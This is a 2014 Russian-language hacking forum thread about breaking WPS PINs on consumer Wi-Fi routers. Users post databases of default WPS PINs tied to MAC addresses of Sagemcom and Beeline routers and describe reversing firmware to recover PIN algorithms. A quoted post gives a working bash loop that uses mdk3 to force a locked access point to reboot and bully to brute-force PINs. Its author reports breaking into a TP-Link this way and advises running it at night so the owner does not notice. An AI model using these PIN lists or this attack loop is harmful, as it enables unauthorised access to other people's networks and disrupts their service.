ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.01.2014, 12:15
|
|
Познавший АНТИЧАТ
Регистрация: 01.09.2013
Сообщений: 1,761
Провел на форуме:
352373
Репутация:
0
|
|
Сообщение от Vikhedgehog
На ADSL2+ модемах от TP-LINK так и есть, жаль что все в основном используют не такие(
а просто у роутеров TP-LINK пины абсолютно не по принципу 16 в 10,ещё и лочатся,правда если роутеры современные,или прошивки свежие...
|
|
|
24.01.2014, 15:47
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Сообщение от СЕРЖ32
тю....ZyXEL 100% пин будет из 16 в 10
А вот тут не согласен
Для серии роутеров ZyXEL ZyWALL, на которых также есть WPS по умолчанию, этот алгоритм не подходит.
|
|
|
|
24.01.2014, 18:00
|
|
Познавший АНТИЧАТ
Регистрация: 01.09.2013
Сообщений: 1,761
Провел на форуме:
352373
Репутация:
0
|
|
Сообщение от binarymaster
А вот тут не согласен
Для серии роутеров ZyXEL ZyWALL, на которых также есть WPS по умолчанию, этот алгоритм не подходит.
принимается потому что не пробовал именно ZyWALL,а только или простые,или lite...
те что я пробовал,абсолютно у всех пин был с 16 в 10,штук 8 таких ZyXEL открыл Все бы только такие точки покупали б
|
|
|
|
24.01.2014, 19:41
|
|
Новичок
Регистрация: 22.01.2014
Сообщений: 23
Провел на форуме:
5794
Репутация:
0
|
|
Делюсь опытом
Всем привет =) хочу поделится опытом и нароботками)
Всеми нами любимый ростелеком предоставляет роутеры фирмы Sagemcom. Зашита у них очень дырявая, они на всех роутерах используют некоторый список Pinов =)
А именно на старых прошивках такая картина:
Код:
4C:17:EB:XX:XX:XX
E8:F1:B0:XX:XX:XX
C0:AC:54:XX:XX:XX
используются пины: 46264848, 76229909, 21464065, 13585907
Для новой прошивки картина хуже( они стали лочится, нашел только пин для одного вида мас:
Код:
7C:03:D8:XX:XX:XX - 10864111
D8:6C:E9:XX:XX:XX - ????????
2C:39:96:XX:XX:XX - ????????
3C:81:D8:XX:XX:XX - ????????
Мною именно этими пинами именно эти мак адреса были открыта на 100%, не 1 осечки, кроме новых прошивок! Каждым пином было открыто более 4 роутеров.(даже с новой прошивкой мне извесный мак)
Так вот, люди если кто пользуется ростелекомом с таким роутером и с маком с неизвесным пином, или уже имеет на руках эти пины поделитесь))))
Так же имеется небольшая база на роутеры билайна Smart-Box:
Код:
00:0E:8F:01:9D:78 38903663
00:0E:8F:01:9D:9C 47300620
00:0E:8F:01:9E:38 41579510
00:0E:8F:01:9E:3C 36887743
00:0E:8F:D3:D7:5C 19552422
Как видно зависимости на первый взгляд не прослеживается, но она должна быть - это же билайн))))
так же есть интересный архив с частыми маками:
Код:
F0:7D:68:3E:50:0F 28504610
F0:7D:68:3E:70:76 83869860
F0:7D:68:3E:B3:BD 11403319
F0:7D:68:3F:FE:90 29558179
F0:7D:68:40:C3:7A 02445908
F0:7D:68:42:9E:FE 16838093
F0:7D:68:42:A8:00 36103690
F0:7D:68:42:A9:40 29481262
F0:7D:68:42:B6:C0 32048988
F0:7D:68:47:22:20 42562573
F0:7D:68:48:EA:B0 64577845
F0:7D:68:48:EB:C2 52857027
F0:7D:68:48:EB:E6 35826071
F0:7D:68:48:EC:38 38366932
F0:7D:68:48:EE:18 46142849
F0:7D:68:48:EE:E8 04325352
F0:7D:68:48:EE:F8 28166597
F0:7D:68:48:EF:14 85466029
F0:7D:68:50:54:BC 10389928
F0:7D:68:50:E2:B4 75425081
F0:7D:68:5B:26:F4 61248939
F0:7D:68:5B:27:C6 78985742
F0:7D:68:5B:28:1C 71452401
F0:7D:68:5B:32:26 75176365
F0:7D:68:5B:B6:AC 62296045
F0:7D:68:5B:B8:14 18375848
F0:7D:68:5B:EC:70 16378315
F0:7D:68:75:8A:97 51762605
F0:7D:68:75:CF:19 94783513
F0:7D:68:81:72:14 41827390
F0:7D:68:81:7A:D0 70182347
F0:7D:68:81:B8:8E 26704548
F0:7D:68:82:3A:32 75682460
F0:7D:68:82:45:A6 94827644
F0:7D:68:82:DD:2B 77305862
F0:7D:68:82:F4:FB 53836908
F0:7D:68:83:15:0B 07021411
F0:7D:68:83:1C:C1 97774167
F0:7D:68:88:8D:AC 76454622
F0:7D:68:8A:9F:EA 44505530
F0:7D:68:8A:A8:48 76433443
F0:7D:68:8C:58:B2 03422045
F0:7D:68:8C:5C:7C 73972396
F0:7D:68:8C:5C:86 96076972
F0:7D:68:8C:6C:A6 28712237
F0:7D:68:8C:6D:8C 74275724
F0:7D:68:8C:6E:90 35967163
F0:7D:68:8D:F0:22 77387097
F0:7D:68:8D:F0:6A 88899367
F0:7D:68:95:30:1E 06329464
F0:7D:68:95:B2:F2 76563287
F0:7D:68:97:C0:D6 56194760
F0:7D:68:97:C0:DC 79133067
F0:7D:68:9B:19:D2 83948398
F0:7D:68:9B:37:42 80514367
F0:7D:68:9B:62:FE 77912954
F0:7D:68:9B:C5:DD 51965334
F0:7D:68:9B:DA:E9 02415635
F0:7D:68:9B:F5:C8 31143769
F0:7D:68:A0:68:BA 29454785
F0:7D:68:A1:66:B0 26639451
Код:
F8:1A:67:8A:F1:04 06695972
F8:1A:67:97:22:18 78488113
F8:1A:67:C3:B3:90 92407213
F8:1A:67:CB:4F:E6 68474836
F8:1A:67:CB:53:D0 14721359
F8:1A:67:CB:57:FC 88821344
F8:1A:67:CC:E7:44 50042227
F8:1A:67:EC:91:EE 36735600
F8:1A:67:EC:99:3E 04165415
F8:1A:67:F8:40:F4 65597231
Вот) Такие у меня дела) считаю что все пины строятся по какой то логике))) надо ток ее просеч)))
|
|
|
|
25.01.2014, 02:30
|
|
Новичок
Регистрация: 22.01.2014
Сообщений: 23
Провел на форуме:
5794
Репутация:
0
|
|
Люди, кто знает,прошивка на роутеры пишется на асемблере???
|
|
|
|
25.01.2014, 06:53
|
|
Member
Регистрация: 21.01.2014
Сообщений: 27
Провел на форуме:
7360
Репутация:
1
|
|
Хорошие выборки, особенно первая. Если там нету шума, можна попробовать поддать ее статистическому анализу в MathLab'е, а вось и найдется какая-нибудь закономерность.
---
Читал что для таких устройств как роутеры ассемблер самый подходящий язык программирования; но прежде чем копаться в этих исходниках, много полезного можно почерпнуть в файловой системе роутера , ядре и загрузчике. На многих девайсах стоит OS MIPS Linux и загрузчик U-Boot, которые хорошо документированы, что облегчает реверсинг.
|
|
|
|
25.01.2014, 13:29
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Загрузчик скорее всего на ассемблере пишут, ну а ядро Linux и остальное ПО, в нём живущее - для этого есть кросс-компилятор gcc на архитектуру MIPS.
Где-то видел статью, в которой был приведён пример написания Hello World на C++ для роутера.
|
|
|
|
25.01.2014, 13:57
|
|
Постоянный
Регистрация: 30.08.2011
Сообщений: 358
Провел на форуме:
66828
Репутация:
11
|
|
Сообщение от Z10Y
Люди, кто знает,прошивка на роутеры пишется на асемблере???
Вы хотите поковырять прошивку на предмет алгоритма генерации пинов? Теоретически, он там может быть, для сброса пина в заводское состояние, когда юзер жмет соответствующую кнопку. Если производитель на у себя сайте выкладывает прошивки, можно попробовать ее распаковать при помощи "Firmware Modification Kit" и поискать соответствующий код. А если не выкладывает, то нужно думать, как ее вытащить из роутера
|
|
|
|
25.01.2014, 16:56
|
|
Member
Регистрация: 12.11.2012
Сообщений: 105
Провел на форуме:
33155
Репутация:
0
|
|
Сообщение от Klaatu
Делюсь интересным опытом.
Как вы знаете, есть точки, которые лочат wps через определенное количество попыток до следующей перезагрузки. Однако, даже после перезагрузки, такие точки в wash все равно продолжают показываться как залоченые. Не знаю, с чем это связано, то ли защита такая, то ли, что более вероятно, криворукие китайцы такое поведение напрограмили. До недавнего времени, я бросал такие точки по понятным причинам. Но тут мне стало интересно, зачем в reaver и bully существует опция -L
Я начал разбираться, и понял, что атаку на wps по некоторым точкам с таким поведением, как я описал выше, можно продолжить. Снова десять попыток и снова блокировка до перезагрузки. Далее, вспомнил про mdk3, попробовал напустить ее на такую точку, и о чудо - она перезагрузилась после непродолжительной атаки(10-15секунд). Ну а дальше требовалось просто автоматизировать процесс перебора десяти пинов, атаки mdk для перезагрузки, и снова перебор итд.....Это было уже дело техники. Сделать это можно примерно так:
Код:
while true
do
timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
sleep 10
timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
sleep 3
done
Одна точка уже сдалась - тупилинк841. Вторая в процессе, судя по мак - это тоже какой-то тупилинк. Так что метод рабочий, по крайней мере для некоторых девайсов этого производителя. Единственное что - нужно не жадничать, и стараться запускать скрипт исключительно в ночное время, а рано утром выключать, т.к. хозяину ТД вряд ли могут понравиться постоянные её перезагрузки, и соответственно, невозможность нормально пользоваться wifi.
С этими параметрами на одной точке выдаёт WPS transaction failed (code: 0x03), re-trying last ping, а на другой-[!] WARNING: Receive timeout occurred. Что посоветуеш?
|
|
|
|
25.01.2014, 20:25
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Сообщение от vedemur
С этими параметрами на одной точке выдаёт WPS transaction failed (code: 0x03), re-trying last ping, а на другой-[!] WARNING: Receive timeout occurred. Что посоветуеш?
Сигнал слабый, увеличить задержку перебора.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
